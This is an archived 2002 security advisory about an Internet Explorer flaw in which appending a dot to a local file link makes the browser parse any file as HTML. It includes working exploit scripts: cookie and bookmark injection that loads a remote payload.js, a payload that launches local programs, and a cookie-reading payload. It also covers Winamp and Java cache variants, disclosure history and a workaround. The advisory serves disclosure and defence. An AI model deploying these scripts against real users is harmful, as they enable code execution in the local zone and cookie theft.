21th May 2002 [SBWID-5354]
COMMAND
IE dot bug
SYSTEMS AFFECTED
IE all releases ??
PROBLEM
_ _
o\' \\,=./ `o
Andreas Sandblad [sandblad@acc.umu.se] posted : (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
In order for IE to parse a local file as a html document the filename
extension must be associated with html documents (normally .htm and
.html). Also html code must be found somewhere in the beginning of the
file (IE will only scan a certain amount of bytes in the file). This is
good security because several types of userdata is stored in local
files (cookies, favorites/bookmarks, application userdata etc). The
problem is that IE can be tricked into thinking that a local file is a
html document regardless of file extension.
The trick is to simply add a dot \".\" when linking to a local
filename. If we link to a file with the .txt extension then we must add
\" .\" instead as of patch MS02-023. To test this behaviour simply
create a file called c:/test.txt with some html code in it. Now compare
the difference in parse behaviour by typing the following in the adress
field:
about:<a href=\"file:///c:/test.txt .\">test.txt .</a>
and compare it with:
about:<a href=\"file:///c:/test.txt\">test.txt</a>
The exploit method is the following:
1. Find a file storing part of data possible to control (generated by IE
or any other third part software).
2. Make sure the data is inserted in the first x amount of bytes.
3. Inject html+script code in the file and link to it together with a dot
(or space + dot for .txt files). The script will be operating in the local
computer zone.
EXPLOITS:
========
----------------------------------------------------------------
NOTE: Please note that you MUST change some variables
in order for the exploits to work. The following exploits
has only been tested on IE 6.0. Because the exploits
require knowledge of exact path to files, they may fail
on non default systems.
----------------------------------------------------------------
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based script execution
IMPACT: Scripting in local computer zone - running local
programs, running signed programs from a webpage,
reading local files.
PATCH: MS02-015 released 28 March 2002 will stop this exploit.
NOTE: - This exploit is designed for Win 98/ME. In order
to work on win 2000/XP username must be known.
Please change cookieFile and scriptFile.
- Code must be in a directory called \"unique\" to
get correct name of cookie file.
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//cookieFile = \"c:/DOCUME~1/ADMINI~1/cookies/administrator@unique[1].txt\";
//cookieFile = \"c:/windows/cookies/anyuser@unique[1].txt\";
//scriptFile = \"http://www.microsoft.com/unique/payload.js\";
function injectCookie(){
code = \"<html><script src=\'\"+scriptFile+\"\'><\"+\"/script><\"+\"/html>\";
document.cookie = \"evil=\"+code+\"; expires=Fri, 13 Dec 2003 23:59:59
GMT;\";
alert(\"*** Cookie injected! ***\");
}
function loadCookie(){
alert(\"*** Loading cookie! ***\");
document.location=\"file:///\"+cookieFile+\".\"; // the important dot!
}
</script>
<a href=\"javascript:injectCookie()\">injectCookie() step 1.</a><br>
<a href=\"javascript:loadCookie()\">loadCookie() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
files = new Array(
\"c:/windows/system32/winmine.exe\",
\"c:/windows/winmine.exe\",
\"c:/winnt/system32/winmine.exe\"
);
function init(){
for (i=0;files[i];i++)
{
s = \'<object classid=CLSID:12345678-1234-1234-1234-123456789012 \';
s+= \'codebase=\"file:///\'+files[i]+\'\" style=display:none></object>\';
document.write(\"<html>\"+s+\"<\"+\"/html>\");
}
}
window.onload=init;
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based cookie reading
IMPACT: Reading content of arbitrary cookie.
PATCH: MS02-023 released 15 May 2002 will stop this exploit.
NOTE: - Use the same exploit as for the
\"Cookie based script execution\", but replace
payload.js with code below.
- cookieRead is set to read your google cookie.
The cookie must of course exist. cookieRead must be
altered.
----------------------------------------------------------------
payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
//cookieRead = \"administrator@google[1].txt\";
//cookieRead = \"anyuser@google[1].txt\";
s = \'<iframe name=i src=\'+cookieRead+\' style=display:none onload=\';
s+= \'alert(i.document.body.innerText)></iframe>\';
document.write(s);
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Favorite/bookmark based script execution
IMPACT: Scripting in local computer zone.
PATCH: NONE
NOTE: - This exploit is designed for Win 98/ME. In order
to work on win 2000/XP username must be known.
Please change bookmarkFile and scriptFile.
- Use the same payload.js as in the exploit
\"Cookie based script execution\".
----------------------------------------------------------------
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//bookmarkFile = \"c:/DOCUME~1/ADMINI~1/favorites/unique.url\";
//bookmarkFile = \"c:/windows/favorites/unique.url\";
//scriptFile = \"http://www.microsoft.com/unique/payload.js\";
function injectBookmark(){
code = \'<html><script>document.scripts[0].src=\"\';
code += scriptFile+\'\"<\'+\'/script><\'+\'/html>\';
window.external.AddFavorite(\'http://\'+code,\'unique\');
}
function loadBookmark(){
alert(\"*** Loading bookmark file! ***\");
document.location=\"file:///\"+bookmarkFile+\".\"; // the important dot!
}
</script>
<a href=\"javascript:injectBookmark()\">injectBookmark() step 1.</a><br>
<a href=\"javascript:loadBookmark()\">loadBookmark() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Third part software based script execution
IMPACT: Scripting in local computer zone. For some softwares
execute arbitrary remote programs.
PATCH: NONE
NOTE: Only a few third part softwares investigated.
----------------------------------------------------------------
Winamp: Winamp stores current playlist in \"c:/program
files/winamp/winamp.m3u\". The playlist will contain artist name and
song title. If we inject html/script code in the artist/title of a mp3
file (ID3v2 tag) that is loaded remotely, the new playlist file will be
saved together with html code. Using the dotbug trick the local
playlist file can be loaded and operate in the local zone. Since the
playlist file will contain the exact path to the \"temporarily internet
folder\", we can using the old \".chm helpfile attack\" or the codebase
of object tag run arbitrary code.
Java(TM) 2 SDK, Standard Edition, v 1.4.0: Classfiles and graphics for
applets are stored in %userprofile%\\.jpi_cache\\file\\1.0\\ Exploit
method: Insert html/script code in a gif picture used in a java applet
loaded from remote webpage. The local filename of the picture will be
named something like (random characters):
exploita.gif-41615d6-26f536aa.gif
This is equal to EXPLOI~1.GIF (old filesystem support). Use the dot bug
trick to load the file as a html document. Script will be operating in
the local computer zone.
Bug History
===========
[2002-02-17]
Initially reported to Microsoft about the dot bug vulnerability.
[2002-03-28]
Microsoft released patch: \"Cookie-based Script Execution\" (MS02-015)
Solution: Files in the cookie directory are not treated as beeing in
the local computer zone.
Problem: Not fixing the real issue. Still possible to use the cookie
based attack to read other cookies.
[2002-03-30]
A non disclosure advisory sent to Bugtraq: \"IE: Remote webpage can
script in local zone\" http://online.securityfocus.com/archive/1/265459
[2002-05-15]
Microsoft released patch: \"Script within Cookies Reading Cookies\"
(MS02-023)
Solution: Put files in the cookie directory in the restrictive zone
(disables exploit to read other cookies). Attempt to disable that local
files with .txt extentension can be parsed as a html document using the
dot bug.
Problem: Real issue still not fixed. By appending \" .\" instead of
\".\" files with .txt extension can be treated as html documents.
SOLUTION
Workaround: Disable active scripting
Wait for yet another I.e patch.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
